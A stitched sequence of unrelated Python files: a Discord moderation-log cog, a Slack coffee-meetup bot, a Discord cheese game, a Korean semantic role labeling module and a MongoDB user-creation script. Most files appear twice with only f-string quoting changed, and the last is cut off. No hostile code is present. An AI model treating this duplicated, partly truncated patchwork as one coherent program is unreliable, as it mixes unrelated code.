f"Last edited {delta} ago" else: # Message was not previously edited, use the created_at datetime as the baseline, no # delta calculation needed timestamp = msg_before.created_at footer = None await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited", response, channel_id=Channels.message_log, timestamp_override=timestamp, footer=footer ) @Cog.listener() async def on_raw_message_edit(self, event: discord.RawMessageUpdateEvent) -> None: """Log raw message edit event to message change log.""" if event.guild_id is None: return # ignore DM edits await self.bot.wait_until_guild_available() try: channel = self.bot.get_channel(int(event.data["channel_id"])) message = await channel.fetch_message(event.message_id) except discord.NotFound: # Was deleted before we got the event return if self.is_message_blacklisted(message): return await asyncio.sleep(1) # Wait here in case the normal event was fired if event.message_id in self._cached_edits: # It was in the cache and the normal event was fired, so we can just ignore it self._cached_edits.remove(event.message_id) return channel = message.channel channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}" before_response = ( f"**Author:** {format_user(message.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" "\n" "This message was not cached, so the message content cannot be displayed." ) after_response = ( f"**Author:** {format_user(message.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" "\n" f"{message.clean_content}" ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (Before)", before_response, channel_id=Channels.message_log ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (After)", after_response, channel_id=Channels.message_log ) @Cog.listener() async def on_thread_update(self, before: Thread, after: Thread) -> None: """Log thread archiving, un-archiving and name edits.""" if self.is_channel_ignored(after.id): log.trace("Ignoring update of thread %s (%d)", after.mention, after.id) return if before.name != after.name: await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Thread name edited", ( f"Thread {after.mention} (`{after.id}`) from {after.parent.mention} (`{after.parent.id}`): " f"`{before.name}` -> `{after.name}`" ) ) return if not before.archived and after.archived: colour = Colours.soft_red action = "archived" icon = Icons.hash_red elif before.archived and not after.archived: colour = Colours.soft_green action = "un-archived" icon = Icons.hash_green else: return await self.send_log_message( icon, colour, f"Thread {action}", ( f"Thread {after.mention} ({after.name}, `{after.id}`) from {after.parent.mention} " f"(`{after.parent.id}`) was {action}" ) ) @Cog.listener() async def on_thread_delete(self, thread: Thread) -> None: """Log thread deletion.""" if self.is_channel_ignored(thread.id): log.trace("Ignoring deletion of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_red, Colours.soft_red, "Thread deleted", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) deleted" ) ) @Cog.listener() async def on_thread_join(self, thread: Thread) -> None: """Log thread creation.""" # If we are in the thread already we can most probably assume we already logged it? # We don't really have a better way of doing this since the API doesn't make any difference between the two if thread.me: return if self.is_channel_ignored(thread.id): log.trace("Ignoring creation of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_green, Colours.soft_green, "Thread created", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) created" ) ) @Cog.listener() async def on_voice_state_update( self, member: discord.Member, before: discord.VoiceState, after: discord.VoiceState ) -> None: """Log member voice state changes to the voice log channel.""" if ( member.guild.id != GuildConstant.id or (before.channel and self.is_channel_ignored(before.channel.id)) or (after.channel and self.is_channel_ignored(after.channel.id)) ): return if member.id in self._ignored[Event.voice_state_update]: self._ignored[Event.voice_state_update].remove(member.id) return # Exclude all channel attributes except the name. diff = DeepDiff( before, after, exclude_paths=("root.session_id", "root.afk"), exclude_regex_paths=r"root\.channel\.(?!name)", ) # A type change seems to always take precedent over a value change. Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} icon = Icons.voice_state_blue colour = Colour.og_blurple() changes = [] for attr, values in diff_values.items(): if not attr: # Not sure why, but it happens. continue old = values["old_value"] new = values["new_value"] attr = attr[5:] # Remove "root." prefix. attr = VOICE_STATE_ATTRIBUTES.get(attr, attr.replace("_", " ").capitalize()) changes.append(f"**{attr}:** `{old}` **→** `{new}`") # Set the embed icon and colour depending on which attribute changed. if any(name in attr for name in ("Channel", "deaf", "mute")): if new is None or new is True: # Left a channel or was muted/deafened. icon = Icons.voice_state_red colour = Colours.soft_red elif old is None or old is True: # Joined a channel or was unmuted/undeafened. icon = Icons.voice_state_green colour = Colours.soft_green if not changes: return message = "\n".join(f"{Emojis.bullet} {item}" for item in sorted(changes)) message = f"{format_user(member)}\n{message}" await self.send_log_message( icon_url=icon, colour=colour, title="Voice state updated", text=message, thumbnail=member.display_avatar.url, channel_id=Channels.voice_log ) def setup(bot: Bot) -> None: """Load the ModLog cog.""" bot.add_cog(ModLog(bot))
import random import uuid import time import re from datetime import datetime from slack import WebClient from slack.errors import SlackApiError def n_even_chunks(lst, n): """Yield n as even chunks as possible from lst.""" last = 0 for i in range(1, n + 1): cur = int(round(i * (len(lst) / n))) yield lst[last:cur] last = cur class Bot: def __init__(self, token, config, bot_env): self.client = None self.token = token self.config = config self.bot_env = bot_env def init_slack(self): self.client = WebClient(self.token) def get_subjects(self): subjects = self.config["subjects"] return f"*{random.choice(subjects)}* eller *{random.choice(subjects)}*" def get_place(self): places = self.config["places"] return random.choice(places) def get_tips(self): tips = self.config["tips"] return random.choice(tips) def invite_members_to_room(self, list_of_reaction_members): random.shuffle(list_of_reaction_members) attach = [] if len(list_of_reaction_members) < self.config["group_size"]: text = self.config["texts"]["noop"] else: text = self.config["texts"]["intro"] for chunk in n_even_chunks( list_of_reaction_members, len(list_of_reaction_members) // self.config["group_size"], ): users = ", ".join([f"<@{x}>" for x in chunk]) attach.append( { "fallback": "TODO", "color": "#36a64f", "title": f"{self.get_place()}", "title_link": f"https://meet.jit.si/ur-mingla-{uuid.uuid4().hex}", "text": f"Förslag på ämnen är {self.get_subjects()}", "footer": f"{users}", } ) if len(list_of_reaction_members) >= self.config["group_size"]: attach.append( { "fallback": "TODO", "color": "#9803fc", "title": "Information om hur botten funkar", # TODO: change below to UR related git repo "title_link": "https://git.svt.se/stbe02/mingla/-/blob/master/README.md", "text": self.config["texts"]["footer"], "footer": f"Dagens tips: {self.get_tips()}", } ) try: self.client.chat_postMessage( username="mingla", channel=self.config["environments"][self.bot_env]["channel"], icon_emoji=":coffee:", text=text, attachments=attach, ) except SlackApiError as e: assert e.response["ok"] is False assert e.response["error"] print(f"Got an error: {e.response["error"]}") def add_reaction(self, message, reaction): self.client.reactions_add( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], name=reaction, ) def remove_reaction(self, message, reaction): self.client.reactions_remove( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], name=reaction, ) def get_reactions(self, message): message = self.client.reactions_get( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], ) return message["message"].get("reactions", []) def get_reaction(self, message, reaction): for r in self.get_reactions(message): if r["name"] == reaction: return r def get_users_reaction(self, message, reaction): r = self.get_reaction(message, reaction) if r: return r["users"] return [] def find_daily_reaction_message(self): response = self.client.conversations_history( channel=self.config["environments"][self.bot_env]["channel"] ) for message in response["messages"]: yday = datetime.now().timetuple().tm_yday if ( message.get("user") == self.config["bot_id"] and re.match(fr"^VOTE {yday}.*", message["text"]) is not None ): return message def list_active_users_in_room(self): if self.bot_env == "production": list_of_online_members = [] else: # use your own userid for development list_of_online_members = ["U06LM2VJ8"] * int(random.random() * 10) response = self.client.conversations_members( channel=self.config["environments"][self.bot_env]["channel"] ) if response.get("ok"): for member in response.get("members", []): r = self.client.users_getPresence(user=member) if r.get("ok") and r.get("presence") == "active": list_of_online_members.append(member) return list_of_online_members def send_message(self, text): try: response = self.client.chat_postMessage( username="mingla", channel=self.config["environments"][self.bot_env]["channel"], icon_emoji=":coffee:", text=text, ) return response except SlackApiError as e: assert e.response["ok"] is False assert e.response["error"] print(f"Got an error: {e.response["error"]}")
import random import uuid import time import re from datetime import datetime from slack import WebClient from slack.errors import SlackApiError def n_even_chunks(lst, n): """Yield n as even chunks as possible from lst.""" last = 0 for i in range(1, n + 1): cur = int(round(i * (len(lst) / n))) yield lst[last:cur] last = cur class Bot: def __init__(self, token, config, bot_env): self.client = None self.token = token self.config = config self.bot_env = bot_env def init_slack(self): self.client = WebClient(self.token) def get_subjects(self): subjects = self.config["subjects"] return f"*{random.choice(subjects)}* eller *{random.choice(subjects)}*" def get_place(self): places = self.config["places"] return random.choice(places) def get_tips(self): tips = self.config["tips"] return random.choice(tips) def invite_members_to_room(self, list_of_reaction_members): random.shuffle(list_of_reaction_members) attach = [] if len(list_of_reaction_members) < self.config["group_size"]: text = self.config["texts"]["noop"] else: text = self.config["texts"]["intro"] for chunk in n_even_chunks( list_of_reaction_members, len(list_of_reaction_members) // self.config["group_size"], ): users = ", ".join([f"<@{x}>" for x in chunk]) attach.append( { "fallback": "TODO", "color": "#36a64f", "title": f"{self.get_place()}", "title_link": f"https://meet.jit.si/ur-mingla-{uuid.uuid4().hex}", "text": f"Förslag på ämnen är {self.get_subjects()}", "footer": f"{users}", } ) if len(list_of_reaction_members) >= self.config["group_size"]: attach.append( { "fallback": "TODO", "color": "#9803fc", "title": "Information om hur botten funkar", # TODO: change below to UR related git repo "title_link": "https://git.svt.se/stbe02/mingla/-/blob/master/README.md", "text": self.config["texts"]["footer"], "footer": f"Dagens tips: {self.get_tips()}", } ) try: self.client.chat_postMessage( username="mingla", channel=self.config["environments"][self.bot_env]["channel"], icon_emoji=":coffee:", text=text, attachments=attach, ) except SlackApiError as e: assert e.response["ok"] is False assert e.response["error"] print(f"Got an error: {e.response['error']}") def add_reaction(self, message, reaction): self.client.reactions_add( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], name=reaction, ) def remove_reaction(self, message, reaction): self.client.reactions_remove( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], name=reaction, ) def get_reactions(self, message): message = self.client.reactions_get( channel=self.config["environments"][self.bot_env]["channel"], timestamp=message["ts"], ) return message["message"].get("reactions", []) def get_reaction(self, message, reaction): for r in self.get_reactions(message): if r["name"] == reaction: return r def get_users_reaction(self, message, reaction): r = self.get_reaction(message, reaction) if r: return r["users"] return [] def find_daily_reaction_message(self): response = self.client.conversations_history( channel=self.config["environments"][self.bot_env]["channel"] ) for message in response["messages"]: yday = datetime.now().timetuple().tm_yday if ( message.get("user") == self.config["bot_id"] and re.match(fr"^VOTE {yday}.*", message["text"]) is not None ): return message def list_active_users_in_room(self): if self.bot_env == "production": list_of_online_members = [] else: # use your own userid for development list_of_online_members = ["U06LM2VJ8"] * int(random.random() * 10) response = self.client.conversations_members( channel=self.config["environments"][self.bot_env]["channel"] ) if response.get("ok"): for member in response.get("members", []): r = self.client.users_getPresence(user=member) if r.get("ok") and r.get("presence") == "active": list_of_online_members.append(member) return list_of_online_members def send_message(self, text): try: response = self.client.chat_postMessage( username="mingla", channel=self.config["environments"][self.bot_env]["channel"], icon_emoji=":coffee:", text=text, ) return response except SlackApiError as e: assert e.response["ok"] is False assert e.response["error"] print(f"Got an error: {e.response['error']}")
"""This is a cog for a discord.py bot. It drops random cheese for people to pick up """ from collections import defaultdict from datetime import datetime as dt from discord import Activity, Client, DMChannel, Embed, Message from discord.ext import commands import asyncio import json import random class Cheese(commands.Cog, command_attrs=dict(hidden=True)): def __init__(self, client, **kwargs): self.client = client self.client.log.info("loading ze cheese!") #Config self.config = dict() self.config['debug'] = kwargs.get("debug", False) self.config['store_file'] = kwargs.get("store_file",'cheese_store.json') self.config['cheese_weight'] = kwargs.get("cheese_weight", 30) self.cheese_weight = (100 - self.config['cheese_weight'], 100) #Emoji Storage in Unicode self.emojis = dict() self.emojis['cheese_emoji'] = u"\U0001F9C0" self.emojis['thumbup_emoji'] = u"\U0001F44D" self.emojis['thumbdown_emoji'] = u"\U0001F44E" #Timer between cheese drops self.last_cheese = dt.utcnow() self.cooldown = 30 #Initialize the score memory self.scores_store = self.load_memory() #Warm up the randomizer random.seed() async def save_memory(self): try: with open(self.config['store_file'], 'w', encoding='utf-8') as f: json.dump(dict(self.scores_store), f) except Exception as e: self.client.log.warning(f"Unable to save cheese memory! : {e}") finally: if self.config['debug']: self.client.log.info(f"{await self.list_current_store_users()}") async def list_current_store_users(self, limit=5): output = [] counter = 1 for k, v in sorted(self.scores_store.items(), key=lambda x: x[1], reverse=True): output.append(f"{counter}. {await self.client.fetch_user(int(k))}: {v}") if counter > limit: break counter += 1 return output def load_memory(self): try: with open(self.config['store_file'], 'r', encoding='utf-8') as f: scores = defaultdict(int) scores.update(json.load(f)) return scores except Exception as e: self.client.log.warning( f"Unable to load cheese memory from file! : {e}") return defaultdict(int) async def add_cheese(self, client: Client, msg: Message): message = 'A wild cheese appeared!' await msg.channel.send(message) await msg.add_reaction(self.emojis['cheese_emoji']) await msg.channel.send(await self.check_reaction(client, msg)) async def check_reaction(self, client: Client, msg: Message): def check(reaction, user): return not user.bot \ and msg.id == reaction.message.id \ and str(reaction.emoji) == self.emojis['cheese_emoji'] message_store = "" try: reaction, user = await client.wait_for('reaction_add', timeout=60.0, check=check) await reaction.clear() self.scores_store[str(user.id)] += 1 await self.save_memory() message_store += f"{self.emojis["thumbup_emoji"]} {user} collected the cheese!" return message_store except asyncio.TimeoutError: message_store += f"{self.emojis["thumbdown_emoji"]} nobody collected the cheese" return message_store @commands.Cog.listener() async def on_message(self, msg: Message): if msg.author.bot or isinstance(msg.channel, DMChannel): # Ignore DM or mesage from a bot return client = self.client chance_result = random.choices( [0, 1], cum_weights=self.cheese_weight)[0] client.log.debug(f"{chance_result=}") if chance_result: if (dt.utcnow() - self.last_cheese).total_seconds() < self.cooldown: return self.last_cheese = dt.utcnow() await self.add_cheese(client, msg) @commands.command() async def scores(self, ctx, *, limit=5): """Get cheese scores""" scores = "\n".join(await self.list_current_store_users()) e = Embed(title='Cheese collected', description=scores, color=0xFF8000) await ctx.send(embed=e) def setup(client): """This is called when the cog is loaded via load_extension""" client.add_cog(Cheese(client))
"""This is a cog for a discord.py bot. It drops random cheese for people to pick up """ from collections import defaultdict from datetime import datetime as dt from discord import Activity, Client, DMChannel, Embed, Message from discord.ext import commands import asyncio import json import random class Cheese(commands.Cog, command_attrs=dict(hidden=True)): def __init__(self, client, **kwargs): self.client = client self.client.log.info("loading ze cheese!") #Config self.config = dict() self.config['debug'] = kwargs.get("debug", False) self.config['store_file'] = kwargs.get("store_file",'cheese_store.json') self.config['cheese_weight'] = kwargs.get("cheese_weight", 30) self.cheese_weight = (100 - self.config['cheese_weight'], 100) #Emoji Storage in Unicode self.emojis = dict() self.emojis['cheese_emoji'] = u"\U0001F9C0" self.emojis['thumbup_emoji'] = u"\U0001F44D" self.emojis['thumbdown_emoji'] = u"\U0001F44E" #Timer between cheese drops self.last_cheese = dt.utcnow() self.cooldown = 30 #Initialize the score memory self.scores_store = self.load_memory() #Warm up the randomizer random.seed() async def save_memory(self): try: with open(self.config['store_file'], 'w', encoding='utf-8') as f: json.dump(dict(self.scores_store), f) except Exception as e: self.client.log.warning(f"Unable to save cheese memory! : {e}") finally: if self.config['debug']: self.client.log.info(f"{await self.list_current_store_users()}") async def list_current_store_users(self, limit=5): output = [] counter = 1 for k, v in sorted(self.scores_store.items(), key=lambda x: x[1], reverse=True): output.append(f"{counter}. {await self.client.fetch_user(int(k))}: {v}") if counter > limit: break counter += 1 return output def load_memory(self): try: with open(self.config['store_file'], 'r', encoding='utf-8') as f: scores = defaultdict(int) scores.update(json.load(f)) return scores except Exception as e: self.client.log.warning( f"Unable to load cheese memory from file! : {e}") return defaultdict(int) async def add_cheese(self, client: Client, msg: Message): message = 'A wild cheese appeared!' await msg.channel.send(message) await msg.add_reaction(self.emojis['cheese_emoji']) await msg.channel.send(await self.check_reaction(client, msg)) async def check_reaction(self, client: Client, msg: Message): def check(reaction, user): return not user.bot \ and msg.id == reaction.message.id \ and str(reaction.emoji) == self.emojis['cheese_emoji'] message_store = "" try: reaction, user = await client.wait_for('reaction_add', timeout=60.0, check=check) await reaction.clear() self.scores_store[str(user.id)] += 1 await self.save_memory() message_store += f"{self.emojis['thumbup_emoji']} {user} collected the cheese!" return message_store except asyncio.TimeoutError: message_store += f"{self.emojis['thumbdown_emoji']} nobody collected the cheese" return message_store @commands.Cog.listener() async def on_message(self, msg: Message): if msg.author.bot or isinstance(msg.channel, DMChannel): # Ignore DM or mesage from a bot return client = self.client chance_result = random.choices( [0, 1], cum_weights=self.cheese_weight)[0] client.log.debug(f"{chance_result=}") if chance_result: if (dt.utcnow() - self.last_cheese).total_seconds() < self.cooldown: return self.last_cheese = dt.utcnow() await self.add_cheese(client, msg) @commands.command() async def scores(self, ctx, *, limit=5): """Get cheese scores""" scores = "\n".join(await self.list_current_store_users()) e = Embed(title='Cheese collected', description=scores, color=0xFF8000) await ctx.send(embed=e) def setup(client): """This is called when the cog is loaded via load_extension""" client.add_cog(Cheese(client))
"""Semantic Role Labeling related modeling class""" from copy import deepcopy from typing import List, Optional from pororo.tasks.utils.base import PororoFactoryBase, PororoSimpleBase class PororoSrlFactory(PororoFactoryBase): """ Conduct semantic role labeling Korean (`charbert.base.ko.srl`) - dataset: UCorpus - metric: TBU - ref: http://nlplab.ulsan.ac.kr/doku.php?id=start Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation Examples: >>> srl = Pororo(task="srl", lang="ko") >>> srl("카터는 역삼에서 카카오브레인으로 출근한다.") [[('카터는', 'AGT'), ('역삼에서', 'LOC'), ('카카오브레인으로', 'GOL'), ('출근한다.', 'PREDICATE')]] >>> srl("피고인은 거제에서 400만 원 상당의 순금목걸이를 피해자로부터 강취하였다.") [[('피고인은', 'AGT'), ('거제에서', '-'), ('400만', '-'), ('원', '-'), ('상당의', '-'), ('순금목걸이를', 'THM'), ('피해자로부터', 'SRC'), ('강취하였다.', 'PREDICATE')]] """ def __init__(self, task: str, lang: str, model: Optional[str]): super().__init__(task, lang, model) @staticmethod def get_available_langs(): return ["ko"] @staticmethod def get_available_models(): return {"ko": ["charbert.base.ko.srl"]} def load(self, device: str): """ Load user-selected task-specific model Args: device (str): device information Returns: object: User-selected task-specific model """ if "charbert" in self.config.n_model: from pororo.models.brainbert import RobertaLabelModel from pororo.tasks import PororoPosFactory model = RobertaLabelModel.load_model( f"bert/{self.config.n_model}", self.config.lang, ).eval().to(device) tagger = PororoPosFactory( task="pos", model="mecab-ko", lang=self.config.lang, ).load(device) return PororoBertSRL(model, tagger, self.config) class PororoBertSRL(PororoSimpleBase): def __init__(self, model, tagger, config): super().__init__(config) self._tagger = tagger self._model = model self._verbs = ["VV", "VA", "XSV", "XSA", "VCN"] def _split_list(self, lst: List, seperator: str): """ Split list using seperator Args: lst (list): PoS tagger pair list seperator (str): seperator token Returns: list: splitted list of list """ res = [] tmp = [] for elem in lst: if elem[0] == seperator: res.append(tmp) tmp = [] continue tmp.append(elem) res.append(tmp) return res def _preprocess(self, sent: str) -> str: """ Preprocess semantic role labeling input to specify predicate Args: sent (str): input sentence Returns: str: preprocessed input """ words = self._split_list([list(tag) for tag in self._tagger(sent)], " ") vs = [] for i, word in enumerate(words): for morph in word: if morph[1] in self._verbs: vs.append(i) break sents = [] for v in vs: morphs = deepcopy(words) morphs[v][0][0] = f"★{morphs[v][0][0]}" sent, seg = str(), str() for elems in morphs: for pair in elems: morph, tag = pair tag = f"{tag} " if morph == " ": sent += "▁ " seg += tag continue chars = [c for c in morph] sent += f"{" ".join(chars)} " seg += tag * len(chars) sent += "▁ " seg += "SPACE " sents.append((sent.strip(), seg.strip())) return sents def _postprocess(self, result: List, origin: str): """ Postprocess semantic role labeling model inference result Args: result (List): inferenced semantic roles origin (str): original query string Returns: List[Tuple]: postprocessed result """ tokens = origin.split() fin = [] for res in result: res = self._split_list(res, "▁") tmp = [] for i, token in enumerate(tokens): if "★" in res[i][0][0]: tmp.append((token, "PREDICATE")) continue tmp.append((token, res[i][0][1])) fin.append(tmp) return fin def predict(self, sent: str): """ Conduct semantic role labeling Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation """ preproc = self._preprocess(sent) if not preproc: return "There is NO predicate to be labeled" res = [] for p in preproc: res.append(self._model.predict_srl(p[0], p[1])) return self._postprocess(res, sent)
"""Semantic Role Labeling related modeling class""" from copy import deepcopy from typing import List, Optional from pororo.tasks.utils.base import PororoFactoryBase, PororoSimpleBase class PororoSrlFactory(PororoFactoryBase): """ Conduct semantic role labeling Korean (`charbert.base.ko.srl`) - dataset: UCorpus - metric: TBU - ref: http://nlplab.ulsan.ac.kr/doku.php?id=start Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation Examples: >>> srl = Pororo(task="srl", lang="ko") >>> srl("카터는 역삼에서 카카오브레인으로 출근한다.") [[('카터는', 'AGT'), ('역삼에서', 'LOC'), ('카카오브레인으로', 'GOL'), ('출근한다.', 'PREDICATE')]] >>> srl("피고인은 거제에서 400만 원 상당의 순금목걸이를 피해자로부터 강취하였다.") [[('피고인은', 'AGT'), ('거제에서', '-'), ('400만', '-'), ('원', '-'), ('상당의', '-'), ('순금목걸이를', 'THM'), ('피해자로부터', 'SRC'), ('강취하였다.', 'PREDICATE')]] """ def __init__(self, task: str, lang: str, model: Optional[str]): super().__init__(task, lang, model) @staticmethod def get_available_langs(): return ["ko"] @staticmethod def get_available_models(): return {"ko": ["charbert.base.ko.srl"]} def load(self, device: str): """ Load user-selected task-specific model Args: device (str): device information Returns: object: User-selected task-specific model """ if "charbert" in self.config.n_model: from pororo.models.brainbert import RobertaLabelModel from pororo.tasks import PororoPosFactory model = RobertaLabelModel.load_model( f"bert/{self.config.n_model}", self.config.lang, ).eval().to(device) tagger = PororoPosFactory( task="pos", model="mecab-ko", lang=self.config.lang, ).load(device) return PororoBertSRL(model, tagger, self.config) class PororoBertSRL(PororoSimpleBase): def __init__(self, model, tagger, config): super().__init__(config) self._tagger = tagger self._model = model self._verbs = ["VV", "VA", "XSV", "XSA", "VCN"] def _split_list(self, lst: List, seperator: str): """ Split list using seperator Args: lst (list): PoS tagger pair list seperator (str): seperator token Returns: list: splitted list of list """ res = [] tmp = [] for elem in lst: if elem[0] == seperator: res.append(tmp) tmp = [] continue tmp.append(elem) res.append(tmp) return res def _preprocess(self, sent: str) -> str: """ Preprocess semantic role labeling input to specify predicate Args: sent (str): input sentence Returns: str: preprocessed input """ words = self._split_list([list(tag) for tag in self._tagger(sent)], " ") vs = [] for i, word in enumerate(words): for morph in word: if morph[1] in self._verbs: vs.append(i) break sents = [] for v in vs: morphs = deepcopy(words) morphs[v][0][0] = f"★{morphs[v][0][0]}" sent, seg = str(), str() for elems in morphs: for pair in elems: morph, tag = pair tag = f"{tag} " if morph == " ": sent += "▁ " seg += tag continue chars = [c for c in morph] sent += f"{' '.join(chars)} " seg += tag * len(chars) sent += "▁ " seg += "SPACE " sents.append((sent.strip(), seg.strip())) return sents def _postprocess(self, result: List, origin: str): """ Postprocess semantic role labeling model inference result Args: result (List): inferenced semantic roles origin (str): original query string Returns: List[Tuple]: postprocessed result """ tokens = origin.split() fin = [] for res in result: res = self._split_list(res, "▁") tmp = [] for i, token in enumerate(tokens): if "★" in res[i][0][0]: tmp.append((token, "PREDICATE")) continue tmp.append((token, res[i][0][1])) fin.append(tmp) return fin def predict(self, sent: str): """ Conduct semantic role labeling Args: sent: (str) sentence to be parsed dependency Returns: List[Tuple[int, str, int, str]]: token index, token label, token head and its relation """ preproc = self._preprocess(sent) if not preproc: return "There is NO predicate to be labeled" res = [] for p in preproc: res.append(self._model.predict_srl(p[0], p[1])) return self._postprocess(res, sent)
#!/usr/bin/env python3 """ Script to create MongoDb users for X-Road Metrics tools. """ # The MIT License # Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS) # Copyright (c) 2017-2020 Estonian Information System Authority (RIA) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import string import secrets import yaml user_roles = { 'analyzer': {'query_db': 'read', 'analyzer_database': 'readWrite'}, 'analyzer_interface': {'query_db': 'read', 'analyzer_database': 'readWrite'}, 'anonymizer': {'query_db': 'read', 'anonymizer_state': 'readWrite'}, 'collector': {'query_db': 'readWrite', 'collector_state': 'readWrite'}, 'corrector': {'query_db': 'readWrite'}, 'reports': {'query_db': 'read', 'reports_state': 'readWrite'} } admin_roles = { 'root': ['root'], 'backup': ['backup'], 'superuser': ['root'] } def create_users(args, client): passwords = {} _create_admin_users(args, client, passwords) _create_opmon_users(args, client, passwords) _print_users(passwords) def _create_admin_users(args, client, passwords): if not args.generate_admins: return for user_name, roles in admin_roles.items(): try: password = user_name if args.dummy_passwords else _generate_password() client.admin.command('createUser', user_name, pwd=password, roles=roles) passwords[user_name] = password except Exception as e: print(f"Failed to create user {user_name}: {e}") def _create_opmon_users(args, client, passwords): for user, roles in user_roles.items(): user_name = f'{user}_{args.xroad}' role_list = [{'db': f'{db}_{args.xroad}', 'role': role} for db, role in roles.items()] password = user_name if args.dummy_passwords else _generate_password() try: client.auth_db.command('createUser', user_name, pwd=password, roles=role_list) passwords[user_name] = password except Exception as e: print(f"Failed to create user {user_name}: {e}") def _print_users(passwords: dict): if len(passwords) == 0: print("No users created.") return width = max([len(k) for k in passwords.keys()]) + 1 width = max(width, len("Username")) print("\nGenerated following users: \n") print(f'{'Username':<{width}}| {'Password':<{13}}| Escaped Password') print(f'{width * '-'}+{'-' * 14}+{'-' * 20}') [print(f'{user:<{width}}| {password} | {_escape_password(password)}') for user, password in passwords.items()] def _generate_password(): """ Generate a random 12 character password. Password contains lower-case, upper-case, numbers and special characters. Based on best-practice recipe from https://docs.python.org/3/library/secrets.html. """ alphabet = string.ascii_letters + string.digits + string.punctuation while True: password = ''.join(secrets.choice(alphabet) for _ in range(12)) if (any(c.islower() for c in password) and any(c.isupper() for c in password) and sum(c.isdigit() for c in password) >= 3 and any(c in string.punctuation for c in password)): return password def _escape_password(password): return yaml.dump(password, default_style='"').strip()
#!/usr/bin/env python3 """ Script to create MongoDb users for X-Road Metrics tools. """ # The MIT License # Copyright (c) 2021- Nordic Institute for Interoperability Solutions (NIIS) # Copyright (c) 2017-2020 Estonian Information System Authority (RIA) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. import string import secrets import yaml user_roles = { 'analyzer': {'query_db': 'read', 'analyzer_database': 'readWrite'}, 'analyzer_interface': {'query_db': 'read', 'analyzer_database': 'readWrite'}, 'anonymizer': {'query_db': 'read', 'anonymizer_state': 'readWrite'}, 'collector': {'query_db': 'readWrite', 'collector_state': 'readWrite'}, 'corrector': {'query_db': 'readWrite'}, 'reports': {'query_db': 'read', 'reports_state': 'readWrite'} } admin_roles = { 'root': ['root'], 'backup': ['backup'], 'superuser': ['root'] } def create_users(args, client): passwords = {} _create_admin_users(args, client, passwords) _create_opmon_users(args, client, passwords) _print_users(passwords) def _create_admin_users(args, client, passwords): if not args.generate_admins: return for user_name, roles in admin_roles.items(): try: password = user_name if args.dummy_passwords else _generate_password() client.admin.command('createUser', user_name, pwd=password, roles=roles) passwords[user_name] = password except Exception as e: print(f"Failed to create user {user_name}: {e}") def _create_opmon_users(args, client, passwords): for user, roles in user_roles.items(): user_name = f'{user}_{args.xroad}' role_list = [{'db': f'{db}_{args.xroad}', 'role': role} for db, role in roles.items()] password = user_name if args.dummy_passwords else _generate_password() try: client.auth_db.command('createUser', user_name, pwd=password, roles=role_list) passwords[user_name] = password except Exception as e: print(f"Failed to create user {user_name}: {e}") def _print_users(passwords: dict): if len(passwords) == 0: print("No users created.") return width = max([len(k) for k in passwords.keys()]) + 1 width = max(width, len("Username")) print("\nGenerated following users: \n") print(f'{"Username":<{width}}| {"Password":<{13}}| Escaped Password') 